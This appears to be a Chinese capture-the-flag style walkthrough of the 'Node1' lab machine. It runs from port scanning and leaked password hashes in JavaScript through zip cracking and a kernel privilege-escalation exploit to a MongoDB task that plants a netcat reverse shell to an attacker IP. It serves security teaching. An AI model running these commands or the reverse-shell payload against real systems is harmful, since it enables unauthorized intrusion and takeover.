Node1靶机通过教学

admin 2025年3月30日22:32:47评论5 views字数 1370阅读4分34秒阅读模式

一、主机发现

arp-scan -l
Node1靶机通过教学

得到靶机ip为192.168.55.152

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.152
Node1靶机通过教学

发现开放了3000端口,竟然没有开放80端口

扫描UDP端口

nmap -sU --min-rate 10000 -p- 192.168.55.152
Node1靶机通过教学

发现不存在UDP端口

2.2目录枚举

dirb http://192.168.55.152:3000
Node1靶机通过教学

没有其它信息,只能通过靶机网站进行信息收集了

2.3漏洞扫描

nmap --script=vuln -p22,3000 192.168.55.152

没有漏洞信息

2.4指纹识别

nmap 192.168.55.152 -sV -sC -O --version-all
Node1靶机通过教学

三、进入靶机网页进行信息收集,拿到低权限shell

进入靶机页面进行信息收集

Node1靶机通过教学

发现了登录框,尝试了SQL注入,发现不太行

Node1靶机通过教学

只好看看网页的源代码了

Node1靶机通过教学

发现这几个js代码的命令像提示

尝试打开看看,在这个js文件中找到了信息

Node1靶机通过教学

继续拼接访问

Node1靶机通过教学

找到了加密后的密码,去进行md5解密

Node1靶机通过教学

尝试登陆tom用户

Node1靶机通过教学

发现只有admin才能登陆,而刚刚的js文件都不是admin,只能继续寻找其它js文件

Node1靶机通过教学

成功找到admin用户

Node1靶机通过教学

破解密码即可

myP14ceAdm1nAcc0uNT
manchester

成功登陆,然后发现可以下载文件

Node1靶机通过教学

使用cat命令查看后发现是base64编码后的文件,先进行解码

 cat myplace.backup | base64 -d >5.txt
Node1靶机通过教学

发现这个文件是zip文件,解压需要密码

爆破压缩密码

fcrackzip -u -D -p rockyou.txt 5.zip 
命令解释:
-D 指定方式为字典猜解
-p 指定猜解字典的路径
-u 表示只显示破解出来的密码,其他错误的密码不显示出
Node1靶机通过教学

成功爆破出来密码:magicword

查看一下app.js文件,成功找到mark用户账号密码

Node1靶机通过教学
mark
5AYRft73VtFpc84k
Node1靶机通过教学

成功登陆!

四、提权

4.1靶机信息收集

Node1靶机通过教学

发现该用户没有sudo权限,没有定时任务,只好尝试在靶机内进行信息收集

4.2exp提权

尝试符合靶机版本的exp

searchsploit Ubuntu 16.04 privilege     # 搜索符合靶机版本的提权漏洞
Node1靶机通过教学

经尝试发现44298.c可以

cd tmp
http://192.168.55.132/44298.c
gcc -o 44298 44298.c 
./44298
Node1靶机通过教学

成功提权!

4.3登陆tom用户

刚刚获得mark账号密码时,发现是连接了Mongodb数据库,尝试使用markidentity进行登陆

mongo -u mark -p 5AYRft73VtFpc84k scheduler
Node1靶机通过教学
show collections    #查看数据库中的集合(类似于mysql中的表)
db.tasks.find({})     #查询tasks中的所有文件

发现里面没有文档,我们可以尝试在其中插入文档进行反弹shell

db.tasks.insert({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.55.132 8888 >/tmp/f"})
Node1靶机通过教学

成功登陆tom用户

原文始发于微信公众号(泷羽Sec-pp502的安全笔记):Node1靶机通过教学

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月30日22:32:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Node1靶机通过教学https://cn-sec.com/archives/3898465.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息